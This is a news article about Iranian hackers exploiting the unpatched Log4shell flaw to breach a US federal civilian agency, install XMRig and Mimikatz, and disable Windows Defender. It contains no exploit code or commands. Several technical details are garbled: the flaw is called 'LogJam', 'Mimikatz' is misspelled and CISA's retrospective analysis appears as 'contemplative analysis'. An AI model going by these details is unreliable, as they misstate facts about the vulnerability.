Log4shell vulnerability exploited by Iranian hacker to breach US federal agency
Iranian hackers have been held accountable for compromising U.S federal agency. As per reports, the hackers took advantage of the Log4shell vulnerability which the US agency had failed to patch. This vulnerability was initially reported on 9th December 2021 now almost a year back but the failure of addressing this vulnerability led to the US agency breach.
Log4shell or Log4J(CVSS severity level 10 out of 10) vulnerability associated with most of the versions of log4j which leads to dangerous remote code execution. This vulnerability lies in a feature that allows variables lookup via naming and directory services such as Lightweight Directory Application Protocol (LDAP protocol) and DNS (Domain Name System). As a result of which, an adversary can redirect the look up to load malicious Java scripts from their servers. LogJam vulnerability (CVE-2021-44228) was later remediated by removing the support for the LDAP protocol altogether in 2.17.0 version. This vulnerability affected more than 90% of cloud-based applications/servers.
This cyberattack was confirmed by American Cyber security agency (CISA) on Thursday. The agency didn’t disclose the name of the FCEB (federal civilian executive branch organization) that was breached in February. The suspected activity on the US agency was first noticed in the month of April when a contemplative analysis (a government run intrusion detection system) was conducted. The agency discovered that the hackers had taken advantage of Log4shell vulnerability to access organization’s network by taking admin and system access.
See more: Strelastealer malware targeting Outlook and Thunderbird users
Though the CISA had instructed all the federal agencies to patch against Log4shell vulnerability by 23rd December however the failure to address this vulnerability led to this cyberattack. Once the hackers got inside the organization’s network, they installed XMRig and MimiKats (credential stealer) to steal passwords and create an admin account for easy access to the systems. With the help of admin account, they disabled AV (Windows Defender) to maintain future access.
See more: Malicious SEO campaign breached approx 17000 WordPress sites
While the reason why federal agency was targeted is ambiguous. Such attacks can be used for surveillance and other threatening attacks. Due to this attack, CISA has warned all the agencies that have not yet patched against Log4shell as it assumes that they would have already been breached and should investigate such suspicious/malicious threats in their environment.
We hope you found article interesting. For more exclusive content follow us on Facebook, Twitter and LinkedIn